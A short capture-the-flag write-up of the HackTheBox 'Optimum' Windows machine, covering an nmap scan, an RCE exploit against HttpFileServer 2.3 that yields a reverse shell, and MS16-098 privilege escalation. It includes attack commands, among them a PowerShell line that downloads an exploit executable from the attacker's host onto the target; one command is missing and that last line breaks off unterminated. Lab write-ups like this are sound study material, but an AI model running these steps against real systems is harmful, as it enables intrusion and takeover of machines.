An easy Windows box from HackTheBox, running a CVE POC to get initial access, and then another POC to get SYSTEM.
Runnning the usual nmap
sudo nmap -sC -sV -oA nmap/optimum 10.10.10.8
Nmap scan report for 10.10.10.8 Host is up (0.038s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-title: HFS / |_http-server-header: HFS 2.3 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
See there is a service called “HTTP File Server” on port 80, version 2.3 - run a searchsploit against it
searchsploit httpfileserver 2.3
And find that there is a RCE for the version, with a python script
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
Download the exploit to current directory, and run it like so
python hfs.py 10.10.10.8 80 "ping 10.10.14.11"
With tcpdump listening for pings
sudo tcpdump icmp
The one from searchsploit didn’t work, but using another python script off of exploitdb it worked, it had a reverse shell baked in as well - now have shell on the system as “kostas”
Get the system info of the machine with
And save the out put to a txt file, and run it against windows exploit suggester after updating it
wes -u wes sysinfo
To find the system vulnerable to MS16-098
Download the exe exploit from github, put it on the box and execute
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.11/41020.exe','C:\Users\kostas\Desktop\41020.exe
And are now system!